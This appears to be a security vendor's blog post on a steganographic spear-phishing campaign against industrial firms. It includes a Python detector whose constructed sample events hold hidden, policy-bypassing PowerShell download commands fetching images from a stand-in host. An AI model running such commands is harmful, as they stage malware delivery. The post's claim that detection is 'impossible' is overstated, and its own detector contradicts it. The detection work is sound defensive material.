Supply chains and industrial enterprises are being targeted by a series of ongoing spear-phishing attacks. The campaign, observed so far on systems in Germany, the United States and Japan, works by concealing its malware in content hosted on public, legitimate services.
Sophisticated attack chain
The attack chain is drawn out enough to escape detection. It starts with phishing emails that have been tailored and customized for each victim. These emails urge the recipient to open the attached Excel document; on opening it, users are asked to enable active content, which triggers a malicious PowerShell script. When the script executes, it reaches out to a public image hosting service and downloads an image, which starts the data-extraction stage.
A distinctive attribute of this spear-phishing campaign is that the data is hidden inside the downloaded image and only later processed by the malware. This tactic is called steganography, the practice of concealing specific data inside another piece of data. By hiding the data inside an image, the attackers can evade cybersecurity solutions that scan the enterprise perimeter.
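The chain described above (an Office document spawning PowerShell, which fetches an image from a public host) leaves a recognisable trace in endpoint process-creation telemetry. The following is an added example, not code from the original post or from any vendor product: it scores constructed, Sysmon-style process events on the combination of an Office parent, a script host, a download cmdlet, evasion flags and an image URL, and flags only events that combine several of these indicators.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (simplified Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "fin-ws01", "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('https://img-host.example/i/9Kz2.png','C:\\Users\\Public\\9Kz2.png')\""},
    {"host": "eng-ws07", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"host": "ops-ws03", "parent": "EXCEL.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iwr https://cdn.img-host.example/x/4a.jpg -OutFile $env:TEMP\\4a.jpg\""},
    {"host": "mkt-ws05", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"iwr https://www.example.org/brand/logo.png -OutFile C:\\Temp\\logo.png\""},
    {"host": "hr-ws02", "parent": "OUTLOOK.EXE", "image": "chrome.exe",
     "cmdline": "chrome.exe https://intranet.example/policy.pdf"},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
                         r"|start-bitstransfer|invoke-restmethod|\birm\b", re.I)
EVASION_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-enc(odedcommand)?\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")

def score_event(ev):
    """Return (score, reasons): one point per indicator present in the event."""
    reasons = []
    cmd = ev["cmdline"]
    if ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SCRIPT_HOSTS:
        reasons.append("script host spawned by an Office process")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download cmdlet in command line")
    if EVASION_RE.search(cmd):
        reasons.append("hidden/bypass/encoded PowerShell flags")
    for url in URL_RE.findall(cmd):
        if urlparse(url).path.lower().endswith(IMAGE_EXTS):
            reasons.append(f"image fetched from {urlparse(url).netloc}")
            break
    return len(reasons), reasons

def triage(events, threshold=3):
    """Return events scoring at or above the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["host"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

A legitimate script that merely downloads a logo (mkt-ws05) scores below the threshold, while the two Excel-spawned downloads of an image with hidden-window flags are surfaced for investigation.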
Analysis of this spear-phishing campaign shows that it is an extremely methodical and targeted attack. The original phishing emails are tailored to the specific targets: users in Japan received emails in Japanese, with the attachment containing the malicious macro.
Unique in its attack capability
While researchers have found variants of this attack since 2018, this new variation is unique because of its affinity for industrial enterprises and supply chains; so far, mostly industrial enterprises have been attacked through this campaign. With the manufacturing sector already seeing a fundamental disruption in revenues due to the ongoing COVID-19 pandemic, this is another major challenge and could cause further problems if not addressed properly.
Secondly, as noted earlier, this phishing campaign relies on steganographic tactics, with the malicious code embedded in images. This makes it impossible for cybersecurity solutions to detect and block the malware. Because the malicious payload is also encrypted and requires a decryption key, it becomes even more difficult for security administrators to analyze and block it.
However, industrial enterprises should not panic but follow a set of security recommendations to ensure maximum protection:
- Ensure employees are educated about spotting and reporting phishing campaigns. Periodic awareness campaigns should be conducted so that employees know the common tactics criminals use to trick them.
- As much as possible, macros should be restricted in Microsoft Office documents to lower the vulnerability threshold
- The importance of strong authentication controls cannot be overemphasized. Employees, especially senior leaders, must be regularly reminded to maintain strong passwords for their user accounts and to change them regularly. Good password hygiene goes a long way in preventing these kinds of spear-phishing attacks.
- If not already done, install and maintain an integrated cybersecurity solution with features such as anti-phishing and anti-virus. It is essential to keep this solution updated with the latest patches.
Seqrite Endpoint Security integrates a range of powerful features such as phishing & spam protection, Antivirus, Anti Ransomware & Email Protection to help industrial enterprises and other organizations ensure complete security and control.